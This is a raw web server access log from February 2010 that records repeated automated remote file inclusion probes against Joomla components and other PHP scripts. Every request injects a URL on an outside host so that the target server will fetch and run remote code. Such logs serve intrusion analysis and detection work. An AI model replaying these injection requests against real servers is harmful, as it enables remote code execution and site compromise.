81.176.226.164 - - [07/Feb/2010:09:18:32 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [07/Feb/2010:09:18:32 -0800] "GET /logs/access_100123.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [07/Feb/2010:09:18:32 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:09:18:32 -0800] "GET /logs/access_100121.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:09:18:33 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [07/Feb/2010:09:18:33 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:09:18:33 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:09:18:33 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:09:18:41 -0800] "GET /logs/access_100123.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:09:18:41 -0800] "GET /logs/access_100123.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.229 - - [07/Feb/2010:09:18:48 -0800] "GET /logs/access_100121.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.229 - - [07/Feb/2010:09:18:48 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.229 - - [07/Feb/2010:09:18:48 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.229 - - [07/Feb/2010:09:19:03 -0800] "GET /logs/access_100123.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:19:05 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:19:05 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:19:08 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:19:08 -0800] "GET /logs/access_100121.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:19:09 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:19:12 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:19:16 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:19:16 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:19:16 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:19:17 -0800] "GET /logs/access_100121.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:19:20 -0800] "GET /logs/access_100121.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:19:23 -0800] "GET /home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:19:24 -0800] "GET /logs/access_100123.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:19:27 -0800] "GET /logs/access_100117.log%20%20/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:19:27 -0800] "GET /logs/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:19:29 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:19:29 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:19:29 -0800] "GET /logs/access_100121.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:19:32 -0800] "GET /logs/access_100123.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:19:32 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:19:32 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:19:32 -0800] "GET /logs/access_100121.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [07/Feb/2010:09:19:34 -0800] "GET /logs/index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [07/Feb/2010:09:19:34 -0800] "GET /logs/access_100107.log/index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:19:36 -0800] "GET /logs/access_100121.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:19:36 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:19:36 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:19:36 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:19:36 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:19:36 -0800] "GET /logs/access_100121.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [07/Feb/2010:09:19:39 -0800] "GET /index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:19:40 -0800] "GET /logs/access_100121.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:19:40 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:19:40 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:19:45 -0800] "GET /logs/access_100129.log%20%20/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:19:48 -0800] "GET /logs/access_100121.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:19:48 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:19:48 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:20:03 -0800] "GET /logs/access_100123.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:20:07 -0800] "GET /logs/access_100123.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:20:12 -0800] "GET /logs/access_100123.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:20:17 -0800] "GET /logs/access_100129.log%20%20/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [07/Feb/2010:09:20:22 -0800] "GET /logs/access_100121.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [07/Feb/2010:09:20:22 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [07/Feb/2010:09:20:22 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [07/Feb/2010:09:20:22 -0800] "GET /logs/access_100123.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:20:24 -0800] "GET /logs/access_100123.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:20:26 -0800] "GET /logs/access_100123.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:20:31 -0800] "GET /logs/access_100123.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:20:37 -0800] "GET /logs/access_100123.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:20:37 -0800] "GET /logs/access_100123.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:20:37 -0800] "GET /logs/access_100129.log%20%20/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:20:40 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:20:43 -0800] "GET /logs/access_100121.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:20:44 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:20:44 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:20:47 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:20:47 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:20:47 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:20:47 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:20:47 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:20:47 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:20:47 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:20:48 -0800] "GET /logs/access_100121.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:20:48 -0800] "GET /logs/access_100121.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:20:52 -0800] "GET /logs/access_100121.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:20:52 -0800] "GET /logs/access_100121.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:20:54 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:20:58 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:20:58 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.0" 200 3626 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:21:01 -0800] "GET /logs/access_100121.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:21:05 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:21:05 -0800] "GET /logs/access_100121.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [07/Feb/2010:09:21:16 -0800] "GET /component/option,com_frontpage//index.php?mosConfig.absolute.path=http://mobapo.net//includes/js/test.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.puaga.com"
203.124.149.168 - - [07/Feb/2010:09:21:16 -0800] "GET /logs//component/option,com_frontpage//index.php?mosConfig.absolute.path=http://mobapo.net//includes/js/test.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:21:26 -0800] "GET /logs/access_100129.log%20%20/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:21:46 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:21:46 -0800] "GET /logs/access_100121.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:21:46 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [07/Feb/2010:09:21:47 -0800] "GET /logs/access_100105.log/index.php?pagina=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:21:59 -0800] "GET /logs/access_100121.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:21:59 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:21:59 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:22:13 -0800] "GET /logs/access_100123.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:22:13 -0800] "GET /logs/access_100123.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:22:13 -0800] "GET /logs/access_100123.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:22:14 -0800] "GET /logs/access_100123.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:22:19 -0800] "GET /logs/access_100129.log%20%20/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:22:20 -0800] "GET /logs/access_100123.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:22:26 -0800] "GET /logs/access_100123.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:09:22:33 -0800] "GET /logs/access_100202.log//bbs/write_update.php?board_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:22:48 -0800] "GET /logs/access_100121.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:22:48 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:22:48 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
202.131.226.52 - - [07/Feb/2010:09:22:58 -0800] "GET /logs/?mosConfig.absolute.path=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
202.131.226.52 - - [07/Feb/2010:09:22:58 -0800] "GET /logs/access_100127.log/?mosConfig.absolute.path=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.131.226.52 - - [07/Feb/2010:09:22:58 -0800] "GET /?mosConfig.absolute.path=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
